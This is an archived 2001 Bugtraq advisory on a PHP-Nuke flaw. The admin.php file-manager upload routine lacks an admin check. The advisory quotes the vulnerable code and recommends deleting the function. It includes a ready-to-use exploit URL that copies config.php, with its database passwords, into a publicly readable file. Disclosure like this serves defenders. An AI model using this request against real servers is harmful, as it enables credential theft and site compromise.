[22724] in bugtraq
twlc advisory: all versions of php nuke are vulnerable...
daemon@ATHENA.MIT.EDU (supergate@twlc.net)
Mon Sep 24 21:12:33 2001
From: supergate@twlc.net
Message-ID: <000701c1452f$7f3fc670$8119fea9@supergate>
To: "bugtraq" <bugtraq@securityfocus.com>
Date: Mon, 24 Sep 2001 21:31:16 +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
twlc security divison
24/09/2001
Php nuke BUGGED.
Found by:
LucisFero and supergate
./twlc
Summary
This time the bug is really dangerous...it allows you to 'cp' any file on
the box... or even upload files...
Systems Affected
all the versions ARE vulnerable
except '5.0 RC1' (i wonder why a released c. is ok while the final 5.2 is
bugged)
Explanation
Do you need sql password?
http://www.server.net/admin.php?upload=1&file=config.php&file_name=hacked.tx
t&wdir=/images/&userfile=config.php&userfile_name=hacked.txt
the admin 'login' page will be prompted just go to
http://www.server.net/images/hacked.txt and you will see config.php that as
everyone knows contain the sql's passwords, you can even upload files...i
leave you the 'fun' to find all the ways to use it... and try to dont be a
SCRIPT KIDDIE we wrote this advisory to help who runs php nuke and NOT TO
LET YOU HAVE FUN.
let me explain you the bug... admin.php contains this routine:
$basedir = dirname($SCRIPT_FILENAME);
$textrows = 20;
$textcols = 85;
$udir = dirname($PHP_SELF);
if(!$wdir) $wdir="/";
if($cancel) $op="FileManager";
if($upload) {
copy($userfile,$basedir.$wdir.$userfile_name);
$lastaction = ""._UPLOADED." $userfile_name --> $wdir";
// This need a rewrite -------------------------------------> OMG! WE
AGREEEEEEEE lmao
//include("header.php");
//GraphicAdmin($hlpfile);
//html_header();
//displaydir();
$wdir2="/";
chdir($basedir . $wdir2);
//CloseTable();
//include("footer.php");
Header("Location: admin.php?op=FileManager");
exit;
}
that doesnt do a check to see if you are logged as admin or no... so you can
use it anyway...
Solution
we erased the function... cause we wanted to remove the file manager anyway
but i suggest you to do the same... -to upload files use FTP-
conclusions:
yet another bug of php nuke... this software is used by thousands of
people... (we run something based on it too) i hope that this time the
author will reply soon and will release a patch too! as i said before just
dont try to be a script kiddie or we simply WONT post anymore this kind of
advisories. Prolly the funny thing is that who first discovered the bug was
LucisFero that... 2 hours before didnt knew php ... so i (supergate) fear
him and you should too.
posted at:
http://www.twlc.net article http://www.twlc.net/article.php?sid=421
bugtraq@securityfocus.com
http://www.phpnuke.org -good luck-
http://sourceforge.net/tracker/?group_id=7511 Project: PHP-Nuke Web Portal
System
and of course mailed to the author of php nuke
contacts (bugs, ideas, insults, cool girls... remember that trojans are
directed to /dev/null):
lucisfero@twlc.net
supergate@twlc.net
http://www.twlc.net (yes we are patched)
peace out pimps. bella a tutti.
eof
